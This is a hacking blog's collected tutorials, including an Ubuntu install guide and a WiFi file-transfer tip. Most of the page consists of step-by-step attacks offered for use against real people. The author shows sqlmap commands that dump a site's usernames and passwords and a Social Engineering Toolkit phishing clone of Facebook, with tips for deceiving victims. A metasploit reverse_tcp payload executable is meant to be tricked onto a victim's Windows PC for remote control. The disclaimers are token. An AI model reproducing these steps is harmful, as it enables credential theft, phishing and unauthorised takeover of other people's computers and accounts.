WHAT'S NEW?
Loading...
Showing posts with label linux. Show all posts
Showing posts with label linux. Show all posts


Greetings to the Hackers of the Globe. With  new security vulnerabilities discovered everyday there's been a vulnerability that has been existing a long time from now and still is very handy to hack Websites.. It's Called SQL injection.

According to Wikipedia:

 SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered forstring literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

Now, we know what is SQL injection. There's a handy tool called SQL Map.

According to SQL Maps SourceForge Wiki 

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers

So Now we have a basic knowledge about SQL injection and SQL Map.. Let's ride over to some hacking examples:
Disclaimer : The tutorial below is for educational purpose, I'm not responsible if you find yourself behind 
the bars for attempting an Unethical Act....

Vulnerable Page:

Now, you have selected your target but how do we perform SQL injection.. For that we need a SQL injection vulnerable page in that site..In simple words you cannot hack any site with it domain like hackerslite.in . For that you'll need a page which is vulnerable to SQL injection..

Finding The Vulnerable Page:

For my demonstration, I'm using a site testphp.vulnweb.com . This site is made intentionally for testing purposes..

1. Go to Google and make a search :   site:testphp.vulnweb.com inurl:php? (replace testphp.vulnweb.com with your desired target)


2. This brings me some search results. Now I open the first site i.e (http://testphp.vulnweb.com/listproducts.php?cat=1) . Now, I test this site weather this is vulnerable to SQL injection.. I do this by typing a ' at the end of the link.. example http://testphp.vulnweb.com/listproducts.php?cat=1'

This brings me a error(see image below)


This shows that the following site is vulnerable to SQL injection. So, now we have found out the target page, lets get into hacking with SQL Map...


HACKING WITH SQLMAP:

Now, fireup sql map....You may use SQL map in kali or another OS (I'm on BackBox).

The First Code i type in the terminal is:

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 --dbs

You should replace the url with your target page...SQL Map may ask you several time for yes or no.. simply
use no and hit enter every time...

The Following code brings me two databases: acuart and information_schema

Now when I have the database name, lets retrieve the table names, the code for that is:

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Here acuart is our database name...This code retrives me some tables : 


| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |

Now, when I have the database name as well as table name, we'll now retrieve the columns..The code is:

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

The Following code retrieves me some columns names:

address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |

So, now lets dump the username and password.. Use the code:

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C uname,pass --dump

Voila, the following code dumps me the sites username and password

Disclaimer : The tutorial above was for educational purpose, I'm not responsible if you find yourself behind 
the bars for attempting an Unethical Act  


That was a simple tutorial on how to hack a website using SQL injection.....

Follow me on twitter @amit_sharma48 for regular updates on each post...
Till then like our Facebook page www.facebook.com/hackerslite





Finally let's talk about some Linux Installation. This is a tutorial on installing Ubuntu 14.10 in a Virtual Machine.

What is Ubuntu? 

Ubuntu is one of the best and popular Linux Distribution. It is easy to use, nice GUI, nice support, secured, comes with many software's pre-installed.

How will it be installed?

We will be installing Ubuntu in a Virtual Machine ( VMWare ). This means that you will be able to enjoy your existing OS with Ubuntu.


Requirements: 

1. VMware Workstation : link (Paid)
    or
    VMWare Player         : link (Free)

2. Ubuntu ISO                : http://www.ubuntu.com/download/desktop


STEPS:

1. Open VMWare and Click on "Create new Virtual Machine"



2. Now you are asked to choose a option from two. Click on Typical and then next 


3. Now check the option saying " Installer disk image file (iso)". Clck on Browse and select the iso file downloaded before. It will automatically detect the Operating system. Click Next


4. In the next step fill in the details asked and click next.



5. Again hit Next. Keep everything default.


6. Again keep everything default and click next and then Finish.




7. This boots up the virtual machine. Now every thing is a self explained. Ubuntu will do the configurations itself. (see images below)





8. So after those stuff completes, VMWare restarts automatically



9. Now you are asked the password which we gave earlier.



10. So, after you enter password and hit enter, YOU ARE IN UBUNTU!!!!!!


Enjoy one of the best Linux Distribution ever and do follow me on twitter @amit_sharma48 for more such tutorials. 
By the time visit our Facebook page @ www.facebook.com/hackerslite





Okay!!! Users. Get rid of those wires messed around your desk to transfer files from your android to PC and vise versa. We have a perfect solution for you to transfer files using your WiFi connection.


Links:

1. Web Sharing Lite for Android: https://play.google.com/store/apps/details?id=nextapp.websharing



STEPS:

1. Open the Web sharing Lite app on your android



2. Input the IP address on your browser url bar at your PC.



3. Input the password, in the password field displayed in android device, and then you will find all your files there




You are simply done, now transfer your files wirelessly

Pro's


1. It is wireless
2. Speed it pretty good ( goes up to 4 MB/S)
3. Nice GUI
4. Displays images as a thumbnail
5. It is free


Con's

1. Session ends when the time exceeds the limit. So it is not advisable to transfer large files exceeding 3 GB


Stay Updated with more such tutorials @amit_sharma48
Like our facebook page @ www.facebook.com/hackerslite


So, after those complicated tutorials on Hacking Facebook using Kali Linux and Hacking Windows using Kali/Backtrack , It's time for a simple and funny Tutorial helping you to Impress your Friend by Editing any website with a simple JavaScript. So Let's get Started:


STEPS:


1. Go to any site (eg. facebook.com)


2. Copy and paste this javascript in your url bar and hit enter:

  javascript:document.body.contentEditable='true'; document.designMode='on'; void 0




3. Now backspace the text and add your own (see image below)




So, this brings an end to a simple and interesting tutorial. Now impress your friends with you new skills
Stay Updated with more such tutorials on Twitter @amit_sharma48



Okay Guysss, so after my previous tutorial on How to hack FB account using wapka phishing , here's one more tutorial on Hacking Facebook account using Kali Linux by a technique called phishing and the best part of this trick is that you can also hack a twitter, gmail, yahoo, aol and many other accounts. So lets start:-

Requirments:

Steps:

1. First go to : applications > kali linux > Exploitation Tools > Social Engineering Toolkit and open set


2. This will open up a terminal with SET loadded. If you are using it for the first time then it may ask you a question, just press y and hit enter. Then it will giive you a set of options. Simply press 1 and hit enter.



3. This brings you another set of options. Now type 2 and hit enter


4. This time type 3 and hit enter


5. This again brings a new set of options. This time type 2 and hit enter


6. Now open a new terminal window. It is a black square  at the top bar (see image below)



7. Type there "ifconfig" (without quotes) and hit enter


8. This brings you a set of text with your IP address. Your IP address should be next to inet addr:  (see image below) . Copy the IP address.




9. Once you have copied the IP address, you can now close this terminal and go back to our previous terminal and paste the IP address there and hit enter. (see image below)




10. Now it ask's you to enter the website address to clone. Simply type www.facebook.com and hit enter
       [ NOTE: You can also type twitter.com , gmail.com or any other account you wanna hack ]




11. Now as you see there will be some text running and then they will stop, that means you have successfull cleared 90% of the journey. Now just give that IP address to you friend and when the page opens there is a similar page to Facebook  (see image below)



12. Now as you friend enter his Email and password to login , you will get them in the terminal (see image below)



Important Things to know about this tricks:
  •  This will work only if the victim is in the same LAN or the same wifi network. To make it work worldwide you will need to enter your public IP which can be found out simply by going to whatismyipaddress.com .
  • You should have a static IP, because if you have a dynamic IP then your IP may change in between the trick.
  • You should use a URL shortening service like goo.gl , bitly.com  etc to shorten your IP url so the victim may fall in this trick
  • Never Turn Off you PC in between otherwise you need to start again
  • Use you social skills to fool the victim inputting his credintials ( eg; Hey bro!! Just check out the new facebooks feature. It's really awesome, just log on via this link)


So, this was it. Enjoy hacking and stay updated on Twitter with many more such tricks @amit_sharma48
Do like our facebook page www.facebook.com/hackerslite




With the web filled with thousands of Proxy Servers, it has become very easy for us to unblock websites and surf anonymously. Now what if your system administrator block the know Proxy Servers, the ultimate solution is to create your own. Don't worry, there's no need of learning complex coding, hard typing and all those networking stuffs. Below is a simple step by step guide for "Creating Your Own Proxy Server" . 
Steps:


1. Go to php-proxy.com and download the zip file.


2. Go to the templates folder and open the index.php file with notepad/notepad++
3. Change the title of the page by editing the <title>PHP-Proxy</title> to a desirable title



4.Go to this line:  <h1 style="color:blue;">PHP-Proxy</h1> . Edit the name from PHP-proxy to desirable name.



5. Upload all files and folders in the same order to a  hosting account: either free or paid
         i) 2freehosting
        ii) 1freehoating
       iii) Hostinger etc


Now you are ready with your own Proxy Server.See a Demo at http://www.hackerslite.pixub.com/proxy/server.php Do comment if you have any problem. I will soon post a video guide on the tutorial above

Stay Updated with more such tutorials on twitter @amit_sharma48
Get in touch on Facebook www.facebook.com/hackerslite


Below is a step by step tutorial on how to hack a windows PC using Kali/ Backtrack.

Requirments:
1. Kali / Backtrack OS- Can be Downloaded from >>>>here<<<<
2. A PC
3. Internet

Procedure:
I would recommend you to burn the ISO on a USB or DVD and run it through them because using it in VMWare or Virtual Box will work only if the target in in the same LAN/Network. And also prefer to use the internet directly through modem (not router) because if you want to do it through your router, then you will also have to perform port forwarding in your router.

1. Run Kali/ Backtrack
2. Open the browser and go to whatismyipaddress.com . Note down the IP.
3. Open terminal and type:

     msfpayload windows/meterpreter/reverse_tcp LHOST=your IP LPORT=4444 x > /root/Desktop/example.exe

Note: Replace "your IP" in the above code with your IP address which we found out before.

4. Now you will get a file called example.exe on the desktop.
5. Now, close that terminal and open a new one and type the following code one by one:


msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT your IP
set LHOST 4444
exploit

Note: Replace your IP with your IP address we found before


6. After executing all of the above codes, give the file example.exe to your victim and convince him to somehow open your file.
7. As soon as he opens the file you will se some text running on your terminal and then you have access to his computer.

Now you can download the text file from >>> here <<< and use the following commands to control his PC.


That's all for this trick. Enjoy hacking and do go to our new youtube channel : hackersliteyoutube.tk to enjoy videos regarding hacking.

Stay Updated on Twitter : www.twitter.com/hackerslite
Do like our facebook page  www.facebook.com/hackerslite.


Follow:

Created by ThemeXpose